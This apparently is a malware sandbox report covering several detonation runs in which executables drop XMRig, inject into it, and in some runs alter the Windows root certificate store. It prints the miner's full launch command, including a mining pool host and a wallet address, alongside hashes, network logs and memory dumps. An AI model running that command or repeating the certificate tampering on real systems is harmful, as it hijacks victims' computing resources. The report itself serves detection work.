Max time kernel
1799s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4488 wrote to memory of 3736 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4488 wrote to memory of 3736 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3736-16-0x0000028BE1960000-0x0000028BE1980000-memory.dmp
memory/3736-17-0x0000028BE19B0000-0x0000028BE19D0000-memory.dmp
memory/3736-18-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-21-0x0000028BE1A10000-0x0000028BE1A30000-memory.dmp
memory/3736-20-0x0000028BE19D0000-0x0000028BE19F0000-memory.dmp
memory/3736-19-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-22-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-23-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-24-0x0000028BE19D0000-0x0000028BE19F0000-memory.dmp
memory/3736-25-0x0000028BE1A10000-0x0000028BE1A30000-memory.dmp
memory/3736-26-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-27-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-28-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-29-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-30-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-31-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-32-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-33-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-34-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-35-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-36-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-37-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-38-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-39-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-40-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-41-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-42-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-43-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-44-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-45-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-46-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-47-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-48-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-49-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-50-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-51-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-52-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-53-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-54-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-55-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-56-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-57-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-58-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-59-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-60-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-61-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-62-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-63-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-64-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-65-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-66-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-67-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-68-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-69-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-70-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-71-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-72-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-73-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-74-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-75-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-76-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-77-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-78-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-79-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-80-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-81-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-82-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-83-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
memory/3736-84-0x00007FF62EEB0000-0x00007FF62F9B3000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:11
Platform
win10v2004-20240426-en
Max time kernel
1793s
Max time network
1798s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1456 wrote to memory of 4908 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1456 wrote to memory of 4908 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4908-16-0x00000284B1620000-0x00000284B1640000-memory.dmp
memory/4908-17-0x00000284B1670000-0x00000284B1690000-memory.dmp
memory/4908-18-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-21-0x00000284B16B0000-0x00000284B16D0000-memory.dmp
memory/4908-20-0x00000284B1690000-0x00000284B16B0000-memory.dmp
memory/4908-19-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-22-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-23-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-24-0x00000284B1690000-0x00000284B16B0000-memory.dmp
memory/4908-25-0x00000284B16B0000-0x00000284B16D0000-memory.dmp
memory/4908-26-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-27-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-28-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-29-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-30-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-31-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-32-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-33-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-34-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-35-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-36-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-37-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-38-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-39-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-40-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-41-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-42-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-43-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-44-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-45-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-46-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-47-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-48-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-49-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-50-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-51-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-52-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-53-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-54-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-55-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-56-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-57-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-58-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-59-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-60-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-61-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-62-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-63-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-64-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-65-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-66-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-67-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-68-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-69-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-70-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-71-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-72-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-73-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-74-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-75-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-76-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-77-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-78-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-79-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-80-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-81-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-82-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-83-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
memory/4908-84-0x00007FF70C9F0000-0x00007FF70D4F3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-27 17:20
Reported
2024-05-27 18:05
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3856 wrote to memory of 1232 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 3856 wrote to memory of 1232 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/1232-16-0x000002AC07870000-0x000002AC07890000-memory.dmp
memory/1232-17-0x000002AC09270000-0x000002AC09290000-memory.dmp
memory/1232-18-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-20-0x000002AC092B0000-0x000002AC092D0000-memory.dmp
memory/1232-19-0x000002AC09290000-0x000002AC092B0000-memory.dmp
memory/1232-21-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-22-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-25-0x000002AC092B0000-0x000002AC092D0000-memory.dmp
memory/1232-24-0x000002AC09290000-0x000002AC092B0000-memory.dmp
memory/1232-23-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-26-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-27-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-28-0x00007FF605320000-0x00007FF605E23000-memory.dmp
memory/1232-29-0x00007FF605320000-0x00007FF605E23000-memory.dmp
